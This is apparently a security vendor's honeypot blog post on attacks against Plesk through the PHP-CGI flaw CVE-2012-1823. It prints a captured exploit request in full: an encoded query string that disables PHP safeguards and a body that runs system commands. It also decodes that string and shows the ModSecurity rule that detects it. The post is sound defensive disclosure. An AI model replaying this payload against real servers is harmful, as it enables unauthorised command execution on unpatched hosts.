Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More
Get access to immediate incident response assistance.
Get access to immediate incident response assistance.
Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More
Last week, hacker "kingcope" provided PoC expliot code for a Plesk 0-day on the Full Disclosure public mail-list. Our web honeypot systems received some exploit attempts so we wanted to share with the community. Here is an example request taken from our ModSecurity audit log:
--0cbefd64-A--
[10/Jun/2013:16:01:11 --0500] FI5-@MCo8AoAADlBVOIAAAAX 88.208.233.113 37872 XXX.XXX.XXX.XXX 80
--0cbefd64-B--
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F
%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F
%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2
D%6E HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
--0cbefd64-C--
<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;uptime;exit"); ?>
The bolded/highlighted portion of the URI is encoded. When decoded, it is:
/phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d disable_functio
ns="" -d open_basedir=none -d auto_prepend_file=php://input -n
This shows the attempt to disable various PHP security functionality and then using default input to be able to appendd the request body content to the response page. The request body portion in section C shows that this request is a simply probe to verify if the web server is vunerable. If it was, it would have responded with results for the following OS commands:
If ModSecurity users are running the OWASP ModSecurity CRS, they would already be protected from this attack. The CRS has many signatures/rules that triggered including:
Message: Warning. Pattern match "<\\?(?!xml)" at ARGS_NAMES:<?php echo "Content-Type:text/html\\r\\n\\r\\n";echo "OK\\n";system("uname -a;id;uptime;exit"); ?>. [file "/etc/httpd/modsecurity.d/crs/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"]
While there was some debate publicly about required Plesk configurations related to Apache ScriptAlias directives, it was determined that the real, underlying issue is the old PHP-CGI (CVE-2012-1823) vuln. We covered this issue in a previous Honeypot Alert blog post.
Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.
Copyright © 2024 Trustwave Holdings, Inc. All rights reserved.